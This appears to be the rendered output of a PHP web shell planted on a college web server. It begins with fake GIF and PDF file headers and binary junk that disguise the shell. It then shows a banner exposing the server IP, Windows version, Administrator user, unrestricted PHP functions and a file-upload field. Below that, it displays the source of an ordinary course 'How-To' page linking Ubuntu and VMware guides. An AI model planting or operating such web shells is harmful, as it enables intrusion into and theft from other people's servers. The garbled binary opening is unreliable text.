GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/CST2608/_Archive/How-To/ |
Upload File : |
<? // How-To/index.php $TRACK = "<b>".basename(__FILE__).'</b> <span class="pv_fl">('.__FILE__.")</span>\n<ol>\n"; ini_set('include_path',ini_get('include_path').PATH_SEPARATOR.$_SERVER['DOCUMENT_ROOT']."/"); // Add the DOCUMENT_ROOT to the include_path. $skipAuthentication = true; include('application.phpinc'); include('Course/courseInfo.phpinc'); include('../classInfo.phpinc'); $headTitle = '_CST_ - '.$courseNumber.' - How-To'; $pageTitle = '_CST_<br>'.$courseNumber.' '.$courseTitle.'<br>How-To'; include('Course/courseInfo.phpinc'); $pageMenu = 'Course/courseMenu.phpinc'; $smallTitle = true; include('common/pageHeader.phpinc'); $sectionTitle = 'How-To'; include('common/sectionHeader.phpinc'); ?> <? /** / <a href="Configure_x-windows_default_screen_resolution">Configure x-windows default screen resolution</a> <br> <br> <a href="Enable_disable_x-windows/index.php">Enable or disable x-windows</a> <br> <a href="Enable_the_mouse_wheel_after_installing_x-windows_desktop">Enable the mouse wheel after installing x-windows desktop</a>. <br> <a href="Enable_the_root_account">Enable the root account</a>. <br> <br> <a href="Fix_unable_to_resolve_host">Fix "unable to resolve host <i>servername</i>" error</a>. <br> Fix "Enter administrative password" error.<br> Press Alt-F2 and run "gconf-editor". Now apps> gksu. Is sudo-mode ticked? If not, tick it and you'll find that your password will be accepted. If sudo-mode is not enabled, then the system is prompting you for the root password when you run a command with 'gksu' (which is what is happening with Synaptic). And, of course, you don't have a root password... <br> <br> <a href="Install_Ubuntu_updates">Install Ubuntu updates</a>. <br> <a href="Install_VMware_Tools">Install VMware Tools</a>. <br> <a href="Install_Webmin_web-based_GUI_admin_tool_for_Linux">Install Webmin web-based GUI admin tool for Linux</a>. <br> <a href="Install_the_x-windows_desktop">Install the x-windows desktop</a>. <br> <br> <a href="Run_a_single_command">Run a single command</a>. <br> <a href="Run_the_Nautilus_file_browser_as_root">Run the Nautilus file browser as root</a>. <br> <br> <a href="../../../How-To/ScreenShot_Paint_Foreground_Window.avi">Screen shot using Paint (Foreground Window)</a>. <br> <a href="../../../How-To/ScreenShot_Paint_Full_Screen.avi">Screen shot using Paint (Full Screen)</a>. <br> <a href="../../../How-To/ScreenShot_Windows_7_Snipping_Tool.avi">Screen shot using the Windows 7 snipping tool</a>. <br> <br> Restart gnome and X with ctrl+alt+backspace. <br> <a href="Shutdown_the_Ubuntu_server">Shutdown the Ubuntu server</a>. <br> <br> <a href="Uninstall_VMware_tools">Uninstall VMware tools</a>. <br> <br> <a href="Upgrade_Ubuntu">Upgrade Ubuntu</a>. <br> /**/ include('common/SectionFooter.phpinc'); include('common/pageFooter.phpinc'); ?>